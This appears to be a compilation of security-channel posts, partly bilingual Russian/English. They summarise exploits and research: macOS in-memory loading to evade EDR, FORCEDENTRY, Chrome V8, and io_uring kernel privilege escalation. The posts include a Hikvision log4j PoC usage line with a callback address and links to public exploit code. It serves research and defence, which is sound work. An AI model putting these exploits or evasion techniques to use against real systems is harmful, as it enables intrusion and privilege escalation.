💥In-Memory Execution in macOS: the Old and the New

As part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.

In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.

|FORCEDENTRY, ты тут?|

🕵️‍♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.

Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE

Проблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах.

🔖Более подробно можно почитать в статье Мэтта.

🕵️‍♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.

Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE

The problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER).

🔖You can read more in Matt's article.

#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2

🔥Deconstructing and Exploiting CVE-2020-6418 (exploit here)

This vulnerability lies in the V8 engine of Google Chrome, namely its optimizing compiler Turbofan. Specifically, the vulnerable version is in Google Chrome’s V8 prior to 80.0.3987.122. In this article, Daniel Toh Jing En will give a step-by-step analysis of the vulnerability, from the root cause to exploitation.

🔥Hikvision pre-auth log4j PoC

Usage:
python3 hik.py hikvisionURL collaboratorAddress:port

|CVE-2022-2602 Kernel Exploit|

🔥The vulnerability is an UAF that impacts the registered file descriptor functionality in the io_uring subsystem. It's possible to register a file in the io_uring context, free it from the Unix Garbage Collector(GC) and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replace the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieve a good timing with a small race window.

🔥CVE-2022-2602 Exploit using userfaultfd technique

🔥CVE-2022-2602 Exploit using inode locking technique.

📕DirtyCred: Escalating Privilege in Linux Kernel

🔖Blog posts:
DirtyCred Remastered: how to turn an UAF into Privilege Escalation

CVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF

💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations

CrowdStrike recently discovered a new exploit method (called OWASSRF) consisting of CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by Microsoft in response to ProxyNotShell.
After initial access via this new exploit method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access, and performed anti-forensics techniques on the Microsoft Exchange server in an attempt to hide their activity.

#Analytics
Top 10 most exploited vulnerabilities in 2022

1. CVE-2022-30190: MS Office "Follina"

2. CVE-2021-44228: Apache Log4Shell

3. CVE-2022-22965: Spring4Shell

4. CVE-2022-1388: F5 BIG-IP

5. CVE-2022-0609: Google Chrome zero-day
https://blog.google/threat-analysis-group/countering-threats-north-korea
6. CVE-2017-11882: Old but not forgotten - MS Office bug

7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell

8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs


9. CVE-2022-26134: Atlassian Confluence RCE flaw

10. CVE-2022-30525: Zyxel RCE vulnerability

#Blue_Team_Techniques
Incident Response Methodologies 2022
https://github.com/certsocietegenerale/IRM

// EN/ES/FR/RU Versions

#Offensive_security
MSI Shenanigans: Offensive Capabilities Overview
https://mgeeky.tech/msi-shenanigans-part-1
]-> Tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner:
https://github.com/mgeeky/msidump
]-> PoC code and samples presenting emerging threat of MSI installer files:
https://github.com/mgeeky/msi-shenanigans

#Threat_Research
#Cloud_Security
1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
https://blog.exodusintel.com/2022/12/19/linux-kernel-exploiting-a-netfilter-use-after-free-in-kmalloc-cg
2. Elastic IP Hijacking - A New Attack Vector in AWS
https://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws

#exploit
1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521:
Remote DoS in Linux kernel WILC1000 wireless driver
https://securitylab.github.com/advisories/GHSL-2022-112_GHSL-2022-115_wilc1000

2. CVE-2022-2602:
io_uring kernel exploit
https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit

3. Directory Traversal Vulnerability in Huawei HG255s Products
https://infosecwriteups.com/directory-ttraversal-vulnerability-in-huawei-hg255s-products-dce941a1d015